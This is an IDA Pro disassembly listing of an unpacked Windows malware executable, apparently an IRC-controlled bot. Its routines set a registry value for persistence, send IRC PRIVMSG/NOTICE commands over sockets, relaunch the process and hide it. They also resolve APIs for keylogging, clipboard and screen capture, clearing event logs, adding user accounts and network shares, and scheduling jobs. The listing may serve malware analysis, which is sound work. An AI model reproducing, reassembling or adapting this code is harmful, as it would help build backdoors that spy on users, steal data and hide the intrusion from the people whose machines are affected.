;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 69688B90902B3D8A5A669817D2040FEB
; File Name : u:\work\69688b90902b3d8a5a669817d2040feb_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0002A000 ( 172032.)
; Section size in file : 0002A000 ( 172032.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
seg000 segment para public 'DATA' use32
assume cs:seg000
;org 401000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_40A263+342�p
; sub_41AEDD+1E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor edi, edi
xor esi, esi
mov ebx, offset aWindata ; "windata"
loc_401010: ; CODE XREF: sub_401000+6A�j
push edi
lea eax, [ebp+var_4]
push eax
push edi
push 0F003Fh
push edi
push edi
push edi
push ds:off_43C054[esi]
push ds:dword_43C050[esi]
call ds:dword_444150 ; RegCreateKeyExA
cmp [ebp+arg_0], edi
jz short loc_401051
push [ebp+arg_0]
call sub_41E1C0
pop ecx
push eax
push [ebp+arg_0]
push 1
push edi
push ebx
push [ebp+var_4]
call ds:dword_4440E4 ; RegSetValueExA
jmp short loc_40105B
; ---------------------------------------------------------------------------
loc_401051: ; CODE XREF: sub_401000+33�j
push ebx
push [ebp+var_4]
call ds:dword_444144 ; RegDeleteValueA
loc_40105B: ; CODE XREF: sub_401000+4F�j
push [ebp+var_4]
call ds:dword_4441E8 ; RegCloseKey
add esi, 8
cmp esi, 18h
jb short loc_401010
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; ---------------------------------------------------------------------------
db 8Bh, 4Ch, 24h
dd 748B5604h, 0C8830C24h, 74F685FFh, 8AD2331Ah, 81D03311h
dd 0FFE2h, 8E8C100h, 30950433h, 410042B2h, 0F7E6754Eh
dd 53C35ED0h, 0DB335756h, 0D529E853h, 4C70001h, 42B63024h
dd 2474FF00h, 0E8F08B14h, 1D492h, 0FF85F88Bh, 26755959h
dd 43EBC033h, 0E8565343h, 1D2F2h, 0F685F08Bh, 0EC745959h
dd 8D016A57h, 6AFF1E44h, 0F2E85001h, 830001D1h, 47F610C4h
dd 0D874100Ch, 0E856534Bh, 0FFFFFF79h, 0E8D88B56h, 1D1A1h
dd 0D145E857h, 0C4830001h, 5FC38B10h
db 5Eh, 5Bh, 0C3h
; ---------------------------------------------------------------------------
loc_40110F: ; DATA XREF: sub_40A263+14�o
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push ds:dword_4444F4
call ds:dword_444218 ; closesocket
call sub_40AFF6
call ds:dword_444224 ; WSACleanup
call ds:dword_444224 ; WSACleanup
mov ebx, ds:dword_42B014
push 64h
call ebx ; Sleep
push 10h
xor edi, edi
lea eax, [ebp-10h]
push edi
push eax
call sub_41E5F0
push 44h
pop esi
push esi
lea eax, [ebp-54h]
push edi
push eax
call sub_41E5F0
add esp, 18h
mov [ebp-54h], esi
mov esi, 104h
push esi
lea eax, [ebp-158h]
push eax
mov dword ptr [ebp-48h], offset byte_42B633
mov dword ptr [ebp-28h], 1
mov [ebp-24h], di
call ds:dword_42B010 ; GetSystemDirectoryA
push esi
lea eax, [ebp-25Ch]
push eax
push edi
call ds:dword_42B00C ; GetModuleFileNameA
lea eax, [ebp-10h]
push eax
lea eax, [ebp-54h]
push eax
lea eax, [ebp-158h]
push eax
push edi
push 28h
push 1
push edi
push edi
lea eax, [ebp-25Ch]
push eax
push edi
call ds:dword_42B008 ; CreateProcessA
test eax, eax
jz short loc_4011D4
push 64h
call ebx ; Sleep
push dword ptr [ebp-10h]
mov esi, ds:dword_42B004
call esi ; CloseHandle
push dword ptr [ebp-0Ch]
call esi ; CloseHandle
loc_4011D4: ; CODE XREF: seg000:004011BE�j
mov eax, [ebp+10h]
mov dword ptr [eax+0B0h], offset dword_444060
mov eax, [esp]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_42B000 ; ExitProcess
int 3 ; Trap to Debugger
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011F5 proc near ; CODE XREF: sub_402472+3F�p
; sub_40274D+1A9�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push 200h
push eax
call sub_41E650
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4441A0 ; send
leave
retn
sub_4011F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40123B proc near ; CODE XREF: sub_401F92+40�p
; sub_401F92+74�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_401256
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_401256: ; CODE XREF: sub_40123B+14�j
push edi
call sub_41E1C0
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_41E1C0
push [ebp+arg_8]
sub esi, eax
push offset aS ; "%s"
lea eax, [ebp+var_400]
push esi
push eax
call sub_41E6FE
lea eax, [ebp+var_400]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_200]
push edi
push offset aSSS ; "%s %s :%s\r\n"
push eax
call sub_41E6A6
add esp, 2Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call ds:dword_4441A0 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_4012D4
push 7D0h
call ds:dword_42B014 ; Sleep
locret_4012D4: ; CODE XREF: sub_40123B+8C�j
leave
retn
sub_40123B endp
; =============== S U B R O U T I N E =======================================
sub_4012D6 proc near ; CODE XREF: sub_40A263+4B�p
push ebx
push ebp
mov ebp, ds:dword_42B024
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_42B020
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_4013F6
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov ds:dword_4440D4, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov ds:dword_4440F0, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov ds:dword_444154, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov ds:dword_4440A4, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov ds:dword_444118, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov ds:dword_4440FC, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov ds:dword_4441A8, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov ds:dword_44407C, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov ds:dword_444124, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov ds:dword_44414C, eax
call esi ; GetProcAddress
cmp ds:dword_4440D4, ebx
mov ds:dword_4441B4, eax
jz short loc_4013D4
cmp ds:dword_4440F0, ebx
jz short loc_4013D4
cmp ds:dword_444154, ebx
jz short loc_4013D4
cmp ds:dword_4440A4, ebx
jz short loc_4013D4
cmp ds:dword_4440FC, ebx
jz short loc_4013D4
cmp ds:dword_4441A8, ebx
jz short loc_4013D4
cmp ds:dword_44407C, ebx
jz short loc_4013D4
cmp ds:dword_444124, ebx
jz short loc_4013D4
cmp ds:dword_44414C, ebx
jz short loc_4013D4
cmp eax, ebx
jnz short loc_4013DE
loc_4013D4: ; CODE XREF: sub_4012D6+B8�j
; sub_4012D6+C0�j ...
mov ds:dword_444264, 1
loc_4013DE: ; CODE XREF: sub_4012D6+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov ds:dword_444208, eax
jz short loc_40140B
push 1
push ebx
call eax
jmp short loc_40140B
; ---------------------------------------------------------------------------
loc_4013F6: ; CODE XREF: sub_4012D6+1D�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_444268, eax
mov ds:dword_444264, 1
loc_40140B: ; CODE XREF: sub_4012D6+117�j
; sub_4012D6+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_42B018 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_401520
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov ds:dword_4441CC, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov ds:dword_444160, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov ds:dword_444084, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov ds:dword_4440F8, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov ds:dword_44409C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov ds:dword_44423C, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov ds:dword_444080, eax
call esi ; GetProcAddress
cmp ds:dword_4441CC, ebx
mov ds:dword_4441A4, eax
jz short loc_4014C4
loc_401490: ; DATA XREF: seg002:off_43F1F8�o
cmp ds:dword_444160, ebx
jz short loc_4014C4
cmp ds:dword_444084, ebx
jz short loc_4014C4
cmp ds:dword_4440F8, ebx
jz short loc_4014C4
cmp ds:dword_44409C, ebx
jz short loc_4014C4
cmp ds:dword_44423C, ebx
jz short loc_4014C4
cmp ds:dword_444080, ebx
jz short loc_4014C4
cmp eax, ebx
jnz short loc_4014CE
loc_4014C4: ; CODE XREF: sub_4012D6+1B8�j
; sub_4012D6+1C0�j ...
mov ds:dword_44426C, 1
loc_4014CE: ; CODE XREF: sub_4012D6+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov ds:dword_4440A0, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov ds:dword_44422C, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov ds:dword_4440B0, eax
call esi ; GetProcAddress
cmp ds:dword_4440A0, ebx
mov ds:dword_4440C0, eax
jz short loc_40152B
cmp ds:dword_44422C, ebx
jz short loc_40152B
cmp ds:dword_4440B0, ebx
jz short loc_40152B
cmp eax, ebx
jnz short loc_401535
jmp short loc_40152B
; ---------------------------------------------------------------------------
loc_401520: ; CODE XREF: sub_4012D6+144�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_444270, eax
loc_40152B: ; CODE XREF: sub_4012D6+232�j
; sub_4012D6+23A�j ...
mov ds:dword_44426C, 1
loc_401535: ; CODE XREF: sub_4012D6+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_4016EE
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov ds:dword_444238, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov ds:dword_444150, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov ds:dword_4440E4, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov ds:dword_4440B8, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov ds:dword_444144, eax
call esi ; GetProcAddress
push offset aOpeneventloga ; "OpenEventLogA"
push edi
mov ds:dword_4441E8, eax
call esi ; GetProcAddress
push offset aCleareventloga ; "ClearEventLogA"
push edi
mov ds:dword_444248, eax
call esi ; GetProcAddress
cmp ds:dword_444238, ebx
mov ds:dword_44411C, eax
jz short loc_4015DE
cmp ds:dword_444150, ebx
jz short loc_4015DE
cmp ds:dword_4440E4, ebx
jz short loc_4015DE
cmp ds:dword_4440B8, ebx
jz short loc_4015DE
cmp ds:dword_444144, ebx
jz short loc_4015DE
cmp ds:dword_4441E8, ebx
jnz short loc_4015E8
loc_4015DE: ; CODE XREF: sub_4012D6+2DE�j
; sub_4012D6+2E6�j ...
mov ds:dword_444274, 1
loc_4015E8: ; CODE XREF: sub_4012D6+306�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov ds:dword_444244, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov ds:dword_444228, eax
call esi ; GetProcAddress
cmp ds:dword_444244, ebx
mov ds:dword_444170, eax
jz short loc_401623
cmp ds:dword_444228, ebx
jz short loc_401623
cmp eax, ebx
jnz short loc_40162D
loc_401623: ; CODE XREF: sub_4012D6+33F�j
; sub_4012D6+347�j
mov ds:dword_444274, 1
loc_40162D: ; CODE XREF: sub_4012D6+34B�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov ds:dword_4441C8, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov ds:dword_44424C, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov ds:dword_4441D0, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov ds:dword_4441EC, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov ds:dword_4440F4, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov ds:dword_444134, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov ds:dword_4441D8, eax
call esi ; GetProcAddress
cmp ds:dword_4441C8, ebx
mov ds:dword_444204, eax
jz short loc_4016D1
cmp ds:dword_44424C, ebx
jz short loc_4016D1
cmp ds:dword_4441D0, ebx
jz short loc_4016D1
cmp ds:dword_4441EC, ebx
jz short loc_4016D1
cmp ds:dword_4440F4, ebx
jz short loc_4016D1
cmp ds:dword_444134, ebx
jz short loc_4016D1
cmp ds:dword_4441D8, ebx
jz short loc_4016D1
cmp eax, ebx
jnz short loc_4016DB
loc_4016D1: ; CODE XREF: sub_4012D6+3C5�j
; sub_4012D6+3CD�j ...
mov ds:dword_444274, 1
loc_4016DB: ; CODE XREF: sub_4012D6+3F9�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov ds:dword_444198, eax
jnz short loc_401703
jmp short loc_4016F9
; ---------------------------------------------------------------------------
loc_4016EE: ; CODE XREF: sub_4012D6+26A�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_444278, eax
loc_4016F9: ; CODE XREF: sub_4012D6+416�j
mov ds:dword_444274, 1
loc_401703: ; CODE XREF: sub_4012D6+414�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_4017CF
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov ds:dword_444250, eax
call esi ; GetProcAddress
push offset aCreatecompatib ; "CreateCompatibleDC"
push edi
mov ds:dword_44421C, eax
call esi ; GetProcAddress
push offset aGetdevicecaps ; "GetDeviceCaps"
push edi
mov ds:dword_444180, eax
call esi ; GetProcAddress
push offset aGetdibcolortab ; "GetDIBColorTable"
push edi
mov ds:dword_444178, eax
call esi ; GetProcAddress
push offset aSelectobject ; "SelectObject"
push edi
mov ds:dword_4441C0, eax
call esi ; GetProcAddress
push offset aBitblt ; "BitBlt"
push edi
mov ds:dword_44408C, eax
call esi ; GetProcAddress
push offset aDeletedc ; "DeleteDC"
push edi
mov ds:dword_444190, eax
call esi ; GetProcAddress
push offset aDeleteobject ; "DeleteObject"
push edi
mov ds:dword_444130, eax
call esi ; GetProcAddress
cmp ds:dword_444250, ebx
mov ds:dword_444184, eax
jz short loc_4017DA
cmp ds:dword_44421C, ebx
jz short loc_4017DA
cmp ds:dword_444180, ebx
jz short loc_4017DA
cmp ds:dword_444178, ebx
jz short loc_4017DA
cmp ds:dword_4441C0, ebx
jz short loc_4017DA
cmp ds:dword_44408C, ebx
jz short loc_4017DA
cmp ds:dword_444190, ebx
jz short loc_4017DA
cmp ds:dword_444130, ebx
jz short loc_4017DA
cmp eax, ebx
jnz short loc_4017E4
jmp short loc_4017DA
; ---------------------------------------------------------------------------
loc_4017CF: ; CODE XREF: sub_4012D6+438�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_444280, eax
loc_4017DA: ; CODE XREF: sub_4012D6+4B9�j
; sub_4012D6+4C1�j ...
mov ds:dword_44427C, 1
loc_4017E4: ; CODE XREF: sub_4012D6+4F5�j
mov ebp, ds:dword_42B018
push offset aWs2_32_dll ; "ws2_32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_401AA0
push offset aWsastartup ; "WSAStartup"
push edi
call esi ; GetProcAddress
push offset aWsasocketa ; "WSASocketA"
push edi
mov ds:dword_444110, eax
call esi ; GetProcAddress
push offset aWsaasyncselect ; "WSAAsyncSelect"
push edi
mov ds:dword_444074, eax
call esi ; GetProcAddress
push offset a__wsafdisset ; "__WSAFDIsSet"
push edi
mov ds:dword_444194, eax
call esi ; GetProcAddress
push offset aWsaioctl ; "WSAIoctl"
push edi
mov ds:dword_44415C, eax
call esi ; GetProcAddress
push offset aWsagetlasterro ; "WSAGetLastError"
push edi
mov ds:dword_4441E0, eax
call esi ; GetProcAddress
push offset aWsacleanup ; "WSACleanup"
push edi
mov ds:dword_4441C4, eax
call esi ; GetProcAddress
push offset aSocket ; "socket"
push edi
mov ds:dword_444224, eax
call esi ; GetProcAddress
push offset aIoctlsocket ; "ioctlsocket"
push edi
mov ds:dword_444100, eax
call esi ; GetProcAddress
push offset aConnect ; "connect"
push edi
mov ds:dword_444094, eax
call esi ; GetProcAddress
push offset aInet_ntoa ; "inet_ntoa"
push edi
mov ds:dword_4440AC, eax
call esi ; GetProcAddress
push offset aInet_addr ; "inet_addr"
push edi
mov ds:dword_444188, eax
call esi ; GetProcAddress
push offset aHtons ; "htons"
push edi
mov ds:dword_44417C, eax
call esi ; GetProcAddress
push offset aHtonl ; "htonl"
push edi
mov ds:dword_444260, eax
call esi ; GetProcAddress
push offset aNtohs ; "ntohs"
push edi
mov ds:dword_444234, eax
call esi ; GetProcAddress
push offset aNtohl ; "ntohl"
push edi
mov ds:dword_444200, eax
call esi ; GetProcAddress
push offset aSend ; "send"
push edi
mov ds:dword_4441DC, eax
call esi ; GetProcAddress
push offset aSendto ; "sendto"
push edi
mov ds:dword_4441A0, eax
call esi ; GetProcAddress
push offset aRecv ; "recv"
push edi
mov ds:dword_4440CC, eax
call esi ; GetProcAddress
push offset aRecvfrom ; "recvfrom"
push edi
mov ds:dword_444064, eax
call esi ; GetProcAddress
mov ds:dword_444088, eax
push offset aBind ; "bind"
push edi
call esi ; GetProcAddress
push offset aSelect ; "select"
push edi
mov ds:dword_4441E4, eax
call esi ; GetProcAddress
push offset aListen ; "listen"
push edi
mov ds:dword_4441B0, eax
call esi ; GetProcAddress
push offset aAccept ; "accept"
push edi
mov ds:dword_444230, eax
call esi ; GetProcAddress
push offset aSetsockopt ; "setsockopt"
push edi
mov ds:dword_4440BC, eax
call esi ; GetProcAddress
push offset aGetsockname ; "getsockname"
push edi
mov ds:dword_444120, eax
call esi ; GetProcAddress
push offset aGethostname ; "gethostname"
push edi
mov ds:dword_444068, eax
call esi ; GetProcAddress
push offset aGethostbyname ; "gethostbyname"
push edi
mov ds:dword_444220, eax
call esi ; GetProcAddress
push offset aGethostbyaddr ; "gethostbyaddr"
push edi
mov ds:dword_444168, eax
call esi ; GetProcAddress
push offset aGetpeername ; "getpeername"
push edi
mov ds:dword_4441FC, eax
call esi ; GetProcAddress
push offset aClosesocket ; "closesocket"
push edi
mov ds:dword_444148, eax
call esi ; GetProcAddress
cmp ds:dword_444110, ebx
mov ds:dword_444218, eax
jz loc_401AAB
cmp ds:dword_444074, ebx
jz loc_401AAB
cmp ds:dword_444194, ebx
jz loc_401AAB
cmp ds:dword_4441E0, ebx
jz loc_401AAB
cmp ds:dword_4441C4, ebx
jz loc_401AAB
cmp ds:dword_444224, ebx
jz loc_401AAB
cmp ds:dword_444100, ebx
jz loc_401AAB
cmp ds:dword_444094, ebx
jz loc_401AAB
cmp ds:dword_4440AC, ebx
jz loc_401AAB
cmp ds:dword_444188, ebx
jz loc_401AAB
cmp ds:dword_44417C, ebx
jz loc_401AAB
cmp ds:dword_444260, ebx
jz loc_401AAB
cmp ds:dword_444234, ebx
jz loc_401AAB
cmp ds:dword_444200, ebx
jz short loc_401AAB
cmp ds:dword_4441A0, ebx
jz short loc_401AAB
cmp ds:dword_4440CC, ebx
jz short loc_401AAB
cmp ds:dword_444064, ebx
jz short loc_401AAB
cmp ds:dword_444088, ebx
jz short loc_401AAB
cmp ds:dword_4441E4, ebx
jz short loc_401AAB
cmp ds:dword_4441B0, ebx
jz short loc_401AAB
cmp ds:dword_444230, ebx
jz short loc_401AAB
cmp ds:dword_4440BC, ebx
jz short loc_401AAB
cmp ds:dword_444120, ebx
jz short loc_401AAB
cmp ds:dword_444068, ebx
jz short loc_401AAB
cmp ds:dword_444220, ebx
jz short loc_401AAB
cmp ds:dword_444168, ebx
jz short loc_401AAB
cmp ds:dword_4441FC, ebx
jz short loc_401AAB
cmp eax, ebx
jnz short loc_401AB5
jmp short loc_401AAB
; ---------------------------------------------------------------------------
loc_401AA0: ; CODE XREF: sub_4012D6+51F�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_444288, eax
loc_401AAB: ; CODE XREF: sub_4012D6+6BE�j
; sub_4012D6+6CA�j ...
mov ds:dword_444284, 1
loc_401AB5: ; CODE XREF: sub_4012D6+7C6�j
push offset aWininet_dll ; "wininet.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_401BBA
push offset aInternetgetcon ; "InternetGetConnectedState"
push edi
call esi ; GetProcAddress
push offset aInternetgetc_0 ; "InternetGetConnectedStateEx"
push edi
mov ds:dword_444078, eax
call esi ; GetProcAddress
push offset aHttpopenreques ; "HttpOpenRequestA"
push edi
mov ds:dword_44425C, eax
call esi ; GetProcAddress
push offset aHttpsendreques ; "HttpSendRequestA"
push edi
mov ds:dword_44412C, eax
call esi ; GetProcAddress
push offset aInternetconnec ; "InternetConnectA"
push edi
mov ds:dword_444258, eax
call esi ; GetProcAddress
push offset aInternetopena ; "InternetOpenA"
push edi
mov ds:dword_44413C, eax
call esi ; GetProcAddress
push offset aInternetopenur ; "InternetOpenUrlA"
push edi
mov ds:dword_444098, eax
call esi ; GetProcAddress
push offset aInternetcracku ; "InternetCrackUrlA"
push edi
mov ds:dword_444108, eax
call esi ; GetProcAddress
push offset aInternetreadfi ; "InternetReadFile"
push edi
mov ds:dword_444070, eax
call esi ; GetProcAddress
push offset aInternetcloseh ; "InternetCloseHandle"
push edi
mov ds:dword_4441B8, eax
call esi ; GetProcAddress
cmp ds:dword_444078, ebx
mov ecx, ds:dword_444098
mov ds:dword_444164, eax
jz short loc_401B96
cmp ds:dword_44425C, ebx
jz short loc_401B96
cmp ds:dword_44412C, ebx
jz short loc_401B96
cmp ds:dword_444258, ebx
jz short loc_401B96
cmp ds:dword_44413C, ebx
jz short loc_401B96
cmp ecx, ebx
jz short loc_401B96
cmp ds:dword_444108, ebx
jz short loc_401B96
cmp ds:dword_444070, ebx
jz short loc_401B96
cmp ds:dword_4441B8, ebx
jz short loc_401B96
cmp eax, ebx
jnz short loc_401BA0
loc_401B96: ; CODE XREF: sub_4012D6+87E�j
; sub_4012D6+886�j ...
mov ds:dword_44428C, 1
loc_401BA0: ; CODE XREF: sub_4012D6+8BE�j
cmp ecx, ebx
jz short loc_401BD5
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible)"
call ecx ; InternetOpenA
cmp eax, ebx
mov ds:dword_444254, eax
jnz short loc_401BD5
jmp short loc_401BCF
; ---------------------------------------------------------------------------
loc_401BBA: ; CODE XREF: sub_4012D6+7EA�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_444290, eax
mov ds:dword_44428C, 1
loc_401BCF: ; CODE XREF: sub_4012D6+8E2�j
mov ds:dword_444254, ebx
loc_401BD5: ; CODE XREF: sub_4012D6+8CC�j
; sub_4012D6+8E0�j
push offset aIcmp_dll ; "icmp.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz short loc_401C1F
push offset aIcmpcreatefile ; "IcmpCreateFile"
push edi
call esi ; GetProcAddress
push offset aIcmpclosehandl ; "IcmpCloseHandle"
push edi
mov ds:dword_444158, eax
call esi ; GetProcAddress
push offset aIcmpsendecho ; "IcmpSendEcho"
push edi
mov ds:dword_44418C, eax
call esi ; GetProcAddress
cmp ds:dword_444158, ebx
mov ds:dword_4441F4, eax
jz short loc_401C2A
cmp ds:dword_44418C, ebx
jz short loc_401C2A
cmp eax, ebx
jnz short loc_401C34
jmp short loc_401C2A
; ---------------------------------------------------------------------------
loc_401C1F: ; CODE XREF: sub_4012D6+90A�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_444298, eax
loc_401C2A: ; CODE XREF: sub_4012D6+939�j
; sub_4012D6+941�j ...
mov ds:dword_444294, 1
loc_401C34: ; CODE XREF: sub_4012D6+945�j
push offset aNetapi32_dll ; "netapi32.dll"
call ebp ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_401D3B
push offset aNetshareadd ; "NetShareAdd"
push edi
call esi ; GetProcAddress
push offset aNetsharedel ; "NetShareDel"
push edi
mov ds:dword_4440E8, eax
call esi ; GetProcAddress
push offset aNetshareenum ; "NetShareEnum"
push edi
mov ds:dword_444104, eax
call esi ; GetProcAddress
push offset aNetschedulejob ; "NetScheduleJobAdd"
push edi
mov ds:dword_44420C, eax
call esi ; GetProcAddress
push offset aNetapibufferfr ; "NetApiBufferFree"
push edi
mov ds:dword_4440A8, eax
call esi ; GetProcAddress
push offset aNetremotetod ; "NetRemoteTOD"
push edi
mov ds:dword_444140, eax
call esi ; GetProcAddress
push offset aNetuseradd ; "NetUserAdd"
push edi
mov ds:dword_44406C, eax
call esi ; GetProcAddress
push offset aNetuserdel ; "NetUserDel"
push edi
mov ds:dword_4440C8, eax
call esi ; GetProcAddress
push offset aNetuserenum ; "NetUserEnum"
push edi
mov ds:dword_4441D4, eax
call esi ; GetProcAddress
push offset aNetusergetinfo ; "NetUserGetInfo"
push edi
mov ds:dword_4440E0, eax
call esi ; GetProcAddress
push offset aNetmessagebuff ; "NetMessageBufferSend"
push edi
mov ds:dword_4440EC, eax
call esi ; GetProcAddress
push offset aNetwkstagetinf ; "NetWkstaGetInfo"
push edi
mov ds:dword_444114, eax
call esi ; GetProcAddress
cmp ds:dword_4440E8, ebx
mov ds:dword_4440DC, eax
jz short loc_401D46
cmp ds:dword_444104, ebx
jz short loc_401D46
cmp ds:dword_44420C, ebx
jz short loc_401D46
cmp ds:dword_4440A8, ebx
jz short loc_401D46
cmp ds:dword_444140, ebx
jz short loc_401D46
cmp ds:dword_44406C, ebx
jz short loc_401D46
cmp ds:dword_4440C8, ebx
jz short loc_401D46
cmp ds:dword_4441D4, ebx
jz short loc_401D46
cmp ds:dword_4440E0, ebx
jz short loc_401D46
cmp ds:dword_4440EC, ebx
jz short loc_401D46
cmp ds:dword_444114, ebx
jnz short loc_401D50
jmp short loc_401D46
; ---------------------------------------------------------------------------
loc_401D3B: ; CODE XREF: sub_4012D6+969�j
call ds:dword_42B01C ; RtlGetLastWin32Error
mov ds:dword_4442A0, eax
loc_401D46: ; CODE XREF: sub_4012D6+A11�j
; sub_4012D6+A19�j ...
mov ds:dword_44429C, 1
loc_401D50: ; CODE XREF: sub_4012D6+A61�j
